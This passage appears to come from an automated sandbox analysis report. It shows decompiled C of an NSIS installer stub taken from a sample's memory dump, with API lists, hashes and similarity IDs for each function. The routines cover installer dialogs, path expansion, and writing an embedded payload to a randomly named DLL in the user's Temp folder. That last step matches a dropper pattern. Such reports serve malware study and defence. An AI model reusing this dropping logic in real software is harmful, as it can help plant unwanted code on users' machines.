            								__eflags = _t86;
            								if(_t86 == 0) {
            									goto L31;
            								}
            								_t100 = _v20 * _v28;
            								__eflags = _t100;
            								_t145 = MulDiv(_t100, _v16, 0x400);
            								goto L30;
            							} else {
            								_push( &_v32);
            								_push( &_v24);
            								_push( &_v44);
            								_push(0x79e550);
            								if( *_t81() == 0) {
            									goto L28;
            								}
            								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
            								L30:
            								_v12 = 1;
            								L31:
            								if(_t145 < E004045FA(5)) {
            									_v8 = 2;
            								}
            								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
            									E00404545(0x3ff, 0xfffffffb, _t87);
            									if(_v12 == 0) {
            										SetDlgItemTextA(_a4, 0x400, 0x79e540);
            									} else {
            										E00404545(0x400, 0xfffffffc, _t145);
            									}
            								}
            								_t88 = _v8;
            								 *0x7a3024 = _t88;
            								if(_t88 == 0) {
            									_v8 = E00401410(7);
            								}
            								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
            									_v8 = 0;
            								}
            								E00403DC9(0 | _v8 == 0x00000000);
            								if(_v8 == 0 &&  *0x79f570 == 0) {
            									E0040417A();
            								}
            								 *0x79f570 = 0;
            								goto L45;
            							}
            						}
            						_t169 = _a8 - 0x405;
            						if(_a8 != 0x405) {
            							goto L45;
            						}
            						goto L21;
            					}
            					_t105 = _a12 & 0x0000ffff;
            					if(_t105 != 0x3fb) {
            						L12:
            						if(_t105 == 0x3e9) {
            							_t140 = 7;
            							memset( &_v72, 0, _t140 << 2);
            							_t144 = 0x79f580;
            							_v76 = _a4;
            							_v68 = 0x79f580;
            							_v56 = E004044DF;
            							_v52 = _t151;
            							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
            							_t110 =  &_v76;
            							_v60 = 0x41;
            							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
            							if(_t110 == 0) {
            								_a8 = 0x40f;
            							} else {
            								E0040521C(0, _t110);
            								E004054CC(_t151);
            								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
            								if(_t114 != 0) {
            									_push(_t114);
            									_push(0);
            									E004059E1(0x3fb, 0x79f580, _t151);
            									_t144 = 0x7a1f20;
            									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
            										lstrcatA(_t151, 0x7a1f20);
            									}
            								}
            								 *0x79f570 =  *0x79f570 + 1;
            								SetDlgItemTextA(_a4, 0x3fb, _t151);
            							}
            						}
            						goto L19;
            					}
            					if(_a12 >> 0x10 != 0x300) {
            						goto L45;
            					}
            					_a8 = 0x40f;
            					goto L12;
            				} else {
            					_t144 = GetDlgItem(_a4, 0x3fb);
            					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
            						E004054CC(_t151);
            					}
            					 *0x7a2758 = _a4;
            					SetWindowTextA(_t144, _t151);
            					_push( *((intOrPtr*)(_a16 + 0x34)));
            					_push(1);
            					E00403DA7(_a4);
            					_push( *((intOrPtr*)(_a16 + 0x30)));
            					_push(0x14);
            					E00403DA7(_a4);
            					E00403DDC(_t144);
            					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
            					if(_t128 == 0) {
            						L45:
            						return E00403E0E(_a8, _a12, _a16);
            					}
            					 *_t128(_t144, 1);
            					goto L8;
            				}
            			}

            APIs
            • GetDlgItem.USER32 ref: 00404230
            • SetWindowTextA.USER32(00000000,?), ref: 0040425C
            • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
            • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
            • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
            • SetDlgItemTextA.USER32 ref: 00404369
              • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
            • SetDlgItemTextA.USER32 ref: 0040447E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
            • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
            • API String ID: 2007447535-1909522251
            • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
            • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
            • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
            				struct tagLOGBRUSH _v16;
            				struct tagRECT _v32;
            				struct tagPAINTSTRUCT _v96;
            				struct HDC__* _t70;
            				struct HBRUSH__* _t87;
            				struct HFONT__* _t94;
            				long _t102;
            				signed int _t126;
            				struct HDC__* _t128;
            				intOrPtr _t130;
            
            				if(_a8 == 0xf) {
            					_t130 =  *0x7a2f88;
            					_t70 = BeginPaint(_a4,  &_v96);
            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
            					_a8 = _t70;
            					GetClientRect(_a4,  &_v32);
            					_t126 = _v32.bottom;
            					_v32.bottom = _v32.bottom & 0x00000000;
            					while(_v32.top < _t126) {
            						_a12 = _t126 - _v32.top;
            						asm("cdq");
            						asm("cdq");
            						asm("cdq");
            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
            						_t87 = CreateBrushIndirect( &_v16);
            						_v32.bottom = _v32.bottom + 4;
            						_a16 = _t87;
            						FillRect(_a8,  &_v32, _t87);
            						DeleteObject(_a16);
            						_v32.top = _v32.top + 4;
            					}
            					if( *(_t130 + 0x58) != 0xffffffff) {
            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
            						_a16 = _t94;
            						if(_t94 != 0) {
            							_t128 = _a8;
            							_v32.left = 0x10;
            							_v32.top = 8;
            							SetBkMode(_t128, 1);
            							SetTextColor(_t128,  *(_t130 + 0x58));
            							_a8 = SelectObject(_t128, _a16);
            							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
            							SelectObject(_t128, _a8);
            							DeleteObject(_a16);
            						}
            					}
            					EndPaint(_a4,  &_v96);
            					return 0;
            				}
            				_t102 = _a16;
            				if(_a8 == 0x46) {
            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
            					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
            				}
            				return DefWindowProcA(_a4, _a8, _a12, _t102);
            			}

            APIs
            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectA.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
            • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
            				struct _ITEMIDLIST* _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				CHAR* _t35;
            				signed int _t37;
            				signed int _t38;
            				signed int _t49;
            				char _t51;
            				signed int _t61;
            				char* _t62;
            				char _t67;
            				signed int _t69;
            				CHAR* _t79;
            				signed int _t86;
            				signed int _t88;
            				void* _t89;
            
            				_t61 = _a8;
            				if(_t61 < 0) {
            					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
            				}
            				_t62 = _t61 +  *0x7a2fb8;
            				_t35 = 0x7a1f20;
            				_t79 = 0x7a1f20;
            				if(_a4 - 0x7a1f20 < 0x800) {
            					_t79 = _a4;
            					_a4 = _a4 & 0x00000000;
            				}
            				while(1) {
            					_t67 =  *_t62;
            					_a11 = _t67;
            					if(_t67 == 0) {
            						break;
            					}
            					__eflags = _t79 - _t35 - 0x400;
            					if(_t79 - _t35 >= 0x400) {
            						break;
            					}
            					_t62 = _t62 + 1;
            					__eflags = _t67 - 0xfc;
            					if(__eflags <= 0) {
            						if(__eflags != 0) {
            							 *_t79 = _t67;
            							_t79 =  &(_t79[1]);
            							__eflags = _t79;
            						} else {
            							 *_t79 =  *_t62;
            							_t79 =  &(_t79[1]);
            							_t62 = _t62 + 1;
            						}
            						continue;
            					}
            					_t37 =  *((char*)(_t62 + 1));
            					_t69 =  *_t62;
            					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
            					_v28 = _t69;
            					_v20 = _t37;
            					_t70 = _t69 | 0x00008000;
            					_t38 = _t37 | 0x00008000;
            					_v24 = _t69 | 0x00008000;
            					_t62 = _t62 + 2;
            					__eflags = _a11 - 0xfe;
            					_v16 = _t38;
            					if(_a11 != 0xfe) {
            						__eflags = _a11 - 0xfd;
            						if(_a11 != 0xfd) {
            							__eflags = _a11 - 0xff;
            							if(_a11 == 0xff) {
            								__eflags = (_t38 | 0xffffffff) - _t86;
            								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
            							}
            							L38:
            							_t79 =  &(_t79[lstrlenA(_t79)]);
            							_t35 = 0x7a1f20;
            							continue;
            						}
            						__eflags = _t86 - 0x1b;
            						if(_t86 != 0x1b) {
            							__eflags = (_t86 << 0xa) + 0x7a4000;
            							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
            						} else {
            							E0040591D(_t79,  *0x7a2f84);
            						}
            						__eflags = _t86 + 0xffffffeb - 6;
            						if(_t86 + 0xffffffeb < 6) {
            							L29:
            							E00405BFB(_t79);
            						}
            						goto L38;
            					}
            					_a8 = _a8 & 0x00000000;
            					 *_t79 =  *_t79 & 0x00000000;
            					_t88 = 4;
            					__eflags = _v20 - _t88;
            					if(_v20 != _t88) {
            						_t49 = _v28;
            						__eflags = _t49 - 0x2b;
            						if(_t49 != 0x2b) {
            							__eflags = _t49 - 0x26;
            							if(_t49 != 0x26) {
            								__eflags = _t49 - 0x25;
            								if(_t49 != 0x25) {
            									__eflags = _t49 - 0x24;
            									if(_t49 != 0x24) {
            										goto L19;
            									}
            									GetWindowsDirectoryA(_t79, 0x400);
            									goto L18;
            								}
            								GetSystemDirectoryA(_t79, 0x400);
            								goto L18;
            							}
            							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
            							__eflags =  *_t79;
            							if( *_t79 != 0) {
            								goto L29;
            							}
            							E004059BF(_t79, "C:\\Program Files");
            							goto L18;
            						} else {
            							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
            							L18:
            							__eflags =  *_t79;
            							if( *_t79 != 0) {
            								goto L29;
            							}
            							goto L19;
            						}
            					} else {
            						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
            						L19:
            						__eflags =  *0x7a3004;
            						if( *0x7a3004 == 0) {
            							_t88 = 2;
            						}
            						do {
            							_t88 = _t88 - 1;
            							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
            							__eflags = _t51;
            							if(_t51 != 0) {
            								 *_t79 =  *_t79 & 0x00000000;
            								__eflags =  *_t79;
            								goto L25;
            							}
            							__imp__SHGetPathFromIDListA(_v8, _t79);
            							_v12 = _t51;
            							E0040521C(_t70, _v8);
            							__eflags = _v12;
            							if(_v12 != 0) {
            								break;
            							}
            							L25:
            							__eflags = _t88;
            						} while (_t88 != 0);
            						__eflags =  *_t79;
            						if( *_t79 != 0) {
            							__eflags = _a8;
            							if(_a8 != 0) {
            								lstrcatA(_t79, _a8);
            							}
            						}
            						goto L29;
            					}
            				}
            				 *_t79 =  *_t79 & 0x00000000;
            				if(_a4 == 0) {
            					return _t35;
            				}
            				return E004059BF(_a4, _t35);
            			}

            APIs
            • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
            • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
            • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
            • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
            • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
            • API String ID: 4227507514-3711765563
            • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
            • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 32%
            			E004026FA() {
            				void* _t23;
            				void* _t28;
            				long _t33;
            				struct _OVERLAPPED* _t48;
            				void* _t51;
            				void* _t53;
            				void* _t54;
            				CHAR* _t55;
            				void* _t58;
            				void* _t59;
            				void* _t60;
            
            				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
            				_t54 = E00402A9A(_t48);
            				_t23 = E00405538(_t54);
            				_push(_t54);
            				if(_t23 == 0) {
            					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
            					_t55 = 0x40a018;
            				} else {
            					_push(0x40a018);
            					E004059BF();
            				}
            				E00405BFB(_t55);
            				_t28 = E00405690(_t55, 0x40000000, 2);
            				 *(_t60 + 8) = _t28;
            				if(_t28 != 0xffffffff) {
            					_t33 =  *0x7a2f8c;
            					 *(_t60 - 0x2c) = _t33;
            					_t53 = GlobalAlloc(0x40, _t33);
            					if(_t53 != _t48) {
            						E004030FF(_t48);
            						E004030CD(_t53,  *(_t60 - 0x2c));
            						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
            						 *(_t60 - 0x30) = _t58;
            						if(_t58 != _t48) {
            							_push( *(_t60 - 0x1c));
            							_push(_t58);
            							_push(_t48);
            							_push( *((intOrPtr*)(_t60 - 0x20)));
            							E00402EBD();
            							while( *_t58 != _t48) {
            								_t59 = _t58 + 8;
            								 *(_t60 - 0x38) =  *_t58;
            								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
            								_t58 = _t59 +  *(_t60 - 0x38);
            							}
            							GlobalFree( *(_t60 - 0x30));
            						}
            						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
            						GlobalFree(_t53);
            						_push(_t48);
            						_push(_t48);
            						_push( *(_t60 + 8));
            						_push(0xffffffff);
            						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
            					}
            					CloseHandle( *(_t60 + 8));
            					_t55 = 0x40a018;
            				}
            				_t51 = 0xfffffff3;
            				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
            					_t51 = 0xffffffef;
            					DeleteFileA(_t55);
            					 *((intOrPtr*)(_t60 - 4)) = 1;
            				}
            				_push(_t51);
            				E00401428();
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
            				return 0;
            			}

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
            • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
            • GlobalFree.KERNEL32 ref: 004027C6
            • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
            • GlobalFree.KERNEL32 ref: 004027DF
            • CloseHandle.KERNEL32(?), ref: 004027F7
            • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 3508600917-1619287098
            • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
            • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E00404D62(CHAR* _a4, CHAR* _a8) {
            				struct HWND__* _v8;
            				signed int _v12;
            				CHAR* _v32;
            				long _v44;
            				int _v48;
            				void* _v52;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				CHAR* _t26;
            				signed int _t27;
            				CHAR* _t28;
            				long _t29;
            				signed int _t39;
            
            				_t26 =  *0x7a2764;
            				_v8 = _t26;
            				if(_t26 != 0) {
            					_t27 =  *0x4092a0; // 0x6
            					_v12 = _t27;
            					_t39 = _t27 & 0x00000001;
            					if(_t39 == 0) {
            						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
            					}
            					_t26 = lstrlenA(0x79ed60);
            					_a4 = _t26;
            					if(_a8 == 0) {
            						L6:
            						if((_v12 & 0x00000004) != 0) {
            							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
            						}
            						if((_v12 & 0x00000002) != 0) {
            							_v32 = 0x79ed60;
            							_v52 = 1;
            							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
            							_v44 = 0;
            							_v48 = _t29 - _t39;
            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
            						}
            						if(_t39 != 0) {
            							_t28 = _a4;
            							 *((char*)(_t28 + 0x79ed60)) = 0;
            							return _t28;
            						}
            					} else {
            						_t26 =  &(_a4[lstrlenA(_a8)]);
            						if(_t26 < 0x800) {
            							_t26 = lstrcatA(0x79ed60, _a8);
            							goto L6;
            						}
            					}
            				}
            				return _t26;
            			}

            APIs
            • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
            • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
            • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
            • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID: `y
            • API String ID: 2531174081-1740403070
            • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
            • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405BFB(CHAR* _a4) {
            				char _t5;
            				char _t7;
            				char* _t15;
            				char* _t16;
            				CHAR* _t17;
            
            				_t17 = _a4;
            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
            					_t17 =  &(_t17[4]);
            				}
            				if( *_t17 != 0 && E00405538(_t17) != 0) {
            					_t17 =  &(_t17[2]);
            				}
            				_t5 =  *_t17;
            				_t15 = _t17;
            				_t16 = _t17;
            				if(_t5 != 0) {
            					do {
            						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
            							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
            							_t16 = CharNextA(_t16);
            						}
            						_t17 = CharNextA(_t17);
            						_t5 =  *_t17;
            					} while (_t5 != 0);
            				}
            				 *_t16 =  *_t16 & 0x00000000;
            				while(1) {
            					_t16 = CharPrevA(_t15, _t16);
            					_t7 =  *_t16;
            					if(_t7 != 0x20 && _t7 != 0x5c) {
            						break;
            					}
            					 *_t16 =  *_t16 & 0x00000000;
            					if(_t15 < _t16) {
            						continue;
            					}
            					break;
            				}
            				return _t7;
            			}

            APIs
            • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
            • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
